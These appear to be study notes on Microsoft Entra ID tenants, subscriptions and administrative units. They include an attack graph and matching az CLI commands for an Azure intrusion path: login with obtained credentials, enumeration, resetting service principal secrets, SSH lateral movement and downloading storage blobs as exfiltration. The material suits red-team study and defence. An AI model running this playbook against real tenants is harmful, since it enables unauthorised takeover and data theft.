Azure Entra
1. Entra ID (Previously Azure Active Directory - AAD)
Reddit thread about Microsoft ID and AD confusion
An Azure subscription houses all Azure resources, while an Entra ID tenant houses all identities.
Microsoft Entra is a family of identity and network access products.
Entra ID (previously Azure AD) is the identity provider for Azure subscriptions, meaning it governs who has access to resources within a subscription. In Azure, multiple subscriptions can trust the same Entra ID directory, allowing for centralized management of resources and users.
A helpful description by Luke on StackOverflow:
A tenant is associated with a single identity (person, company, or organization) and can own one or several subscriptions.
A subscription is linked to a payment setup, and each subscription will result in a separate bill.
Within each subscription, you can add virtual resources (VM, storage, network, etc.).
From the official site:
Microsoft Cloud Offerings Overview
1.1 Summary of the Hierarchy
Here is a quick recap:
An organization can have multiple subscriptions.
A subscription can have multiple licenses.
Licenses can be assigned to individual user accounts.
User accounts are stored in a Microsoft Entra tenant.
Here’s an example of the relationship between organizations, subscriptions, licenses, and user accounts:
An organization is identified by its public domain name.
It can have a Microsoft 365 E3 subscription with user licenses.
It can also have a Microsoft 365 E5 subscription with user licenses.
Or a Dynamics 365 subscription with user licenses.
Along with multiple Azure subscriptions.
All the organization's user accounts are managed within a common Microsoft Entra tenant.
1.2 Command
graph TD A[Initial Access: Azure Credentials or Access Token] --> B[Login to Azure using PowerShell/Azure CLI] B --> C[Enumerate Tenant Information] C --> D[Enumerate Users] C --> E[Enumerate Groups] C --> F[Enumerate Service Principals] C --> G[Enumerate Applications] C --> H[Enumerate Administrative Units] D --> D1[Check for Privileged Roles] D --> D2[Check MFA Status for Users] D --> D3[Check for Weak Password Policies] D1 --> D4[Check for Global Admins] E --> E1[Check for Group Ownership] E --> E2[Check for Nested Group Membership] E --> E3[Check Privileged Group Memberships] F --> F1[Check for Privileged Roles on Service Principals] F --> F2[Check for Service Principal Secrets] F --> F3[Check for OAuth2 Permissions] F --> F4[Attempt to Enumerate App Permissions] G --> G1[Check for Application Permissions] G --> G2[Check for Admin Consent on Apps] G --> G3[Check Federated Identity Credentials] H --> H1[Check Roles in Administrative Units] H --> H2[Exploit Administrative Unit Permissions] D4 --> I[Identify Potential Privilege Escalation Paths] F3 --> J[Check for Excessive Permissions on App Roles] F4 --> K[Check for Vulnerable App Permissions] I --> L[Attempt Privilege Escalation] F --> M[Check Owned Objects for Service Principals] M --> N[Exploit Service Principal Owned Resources] H2 --> O[Exploit Administrative Unit Roles for Lateral Movement] N --> P[Exfiltrate Data from Sensitive Applications/Resources] L --> P O --> P
Commands Combined with Each Step:
1. Initial Access: Azure Credentials or Access Token
Login using Azure CLI:
az login -u <username> -p <password>
Login using Service Principal:
az login --service-principal -u <appId> -p <secret> --tenant <tenantId>
2. Enumerate Tenant Information
- Get Tenant Info:
az account show
3. Enumerate Users
List Users:
az ad user list --output table
Check for Privileged Roles:
az role assignment list --assignee <userId>
4. Check MFA Status for Users
- Check MFA Status using Graph API:
az rest --method GET --url "" | jq '.value[] | {userPrincipalName, mfaEnabled}'
5. Check for Weak Password Policies
Using Microsoft Graph API via
az rest
:az rest --method GET --url "" --headers "Content-Type=application/json"
Using PowerShell:
Get-AzureADPolicy | Where-Object {$_.Type -eq "PasswordPolicy"}
6. Enumerate Groups
List Groups:
az ad group list --output table
Check Group Ownership:
az ad group owner list --group <groupName>
7. Enumerate Service Principals
List Service Principals:
az ad sp list --output table
Check for Service Principal Secrets:
az ad sp credential list --id <spId>
8. Enumerate Applications
List Applications:
az ad app list --output table
Check Application Permissions:
az ad app permission list --id <appId>
9. Enumerate Administrative Units
- List Administrative Units:
az rest --method GET --url "" | jq '.value[] | {id, displayName}'
10. Check Roles in Administrative Units
- List Roles in Administrative Units:
az rest --method GET --url "<adminUnitId>/scopedRoleMembers" | jq '.value[]'
11. Check Privileged Roles on Service Principals
- List Role Assignments for Service Principals:
az role assignment list --assignee <spId>
12. Set New Secrets for Service Principals
- Reset Service Principal Secrets:
az ad sp credential reset --id <spId> --password <newPassword>
13. Lateral Movement: Access Virtual Machines
- Connect to VM using SSH:
az vm ssh --ip-address <ipAddress> --username <username>
14. Exfiltrate Data from Storage Accounts
List Storage Blobs:
az storage blob list --container-name <containerName> --account-name <storageAccountName> --output table
Download Blob Content:
az storage blob download --container-name <containerName> --name <blobName> --file <localFilePath> --account-name <storageAccountName>
15. Privilege Escalation via Service Principals
- Check OAuth2 Permissions for Privilege Escalation:
az ad sp permission list --id <spId>
16. Re-Login Using New Privileges
- Login with Updated Privileges:
az login --service-principal -u <appId> -p <newPassword> --tenant <tenantId>
1.3 A sample architecture by Julian Sperling.
2. Administrative Units
Microsoft documentation on Administrative Units:
An administrative unit is a Microsoft Entra resource that can serve as a container for other Microsoft Entra resources. An administrative unit can contain only users, groups, or devices.
Administrative units can be managed through the following interface:
According to SysCloud's blog on Azure Administrative Units:
You can assign users to an Azure AD role with a scope that's limited to one or more administrative units. In this way, administrative units provide more granular administrative control within Azure Active Directory.
The image below is an example from 8. Execute Azure Credential Shuffle to Achieve Objectives. It’s common to see the term "manage" in the description column. One of the main benefits of Entra ID Administrative Units is that they allow an organization to delegate admin permissions to other users, devices, or groups, with restrictions to specific organizational units, regions, departments, etc.
It seems to me that Administrative Units are a way to delegate the management of distributed resources.